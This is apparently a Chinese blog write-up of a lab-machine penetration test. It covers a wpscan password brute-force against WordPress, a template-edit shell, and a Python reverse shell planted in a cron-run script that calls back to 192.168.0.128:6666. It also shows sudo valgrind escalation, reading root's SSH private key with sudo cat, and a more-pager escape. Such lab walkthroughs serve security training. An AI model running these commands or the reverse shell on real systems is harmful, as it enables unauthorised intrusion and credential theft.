靶机渗透日记

  1. 端口

    在这里插入图片描述

  2. 访问 80 端口

    在这里插入图片描述

    wordpress 搭建的网站

  3. 目录扫描

    在这里插入图片描述

  4. 使用 wpscan 扫描

    在这里插入图片描述

    没有扫描到插件信息,但是扫描到了 admin 用户

    爆破 admin

    wpscan --url http://192.168.0.134 -U admin -P /usr/share/wordlists/rockyou.txt
    

    在这里插入图片描述

  5. 得到账号密码,登录后台,编辑模板成功GETSHELL

    在这里插入图片描述

  6. 信息收集

    ls -al /var/www/.bash_history
    

    在这里插入图片描述

    结合下面 su - father 语句,perso.txt 中就是该用户的密码

  7. 发现mother目录属于father组,由于完全控制权限

    在这里插入图片描述

    发现每隔一段时间以 mother 用户(UID=1001)运行 check.py

    将反弹shell写入check.py

    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("192.168.0.128",6666))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])
    

    在这里插入图片描述

  8. mother 可以以baby运行valgrind

    在这里插入图片描述

    sudo -u baby valgrind /bin/bash
    

    在这里插入图片描述

  9. cat 具有 sudo 权限

    sudo cat /root/.ssh/id_rsa
    

    得到 root 用户的私钥,免密码登录ssh

    登录ssh会自动断开连接,发现在 /root/authorized_keys 执行了 /root/troll.sh,该文件先运行查看了welcome.txt,然后 exit ,这里需要绕过 more

    stty columns 50 rows 50
    !/bin/bash
    
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值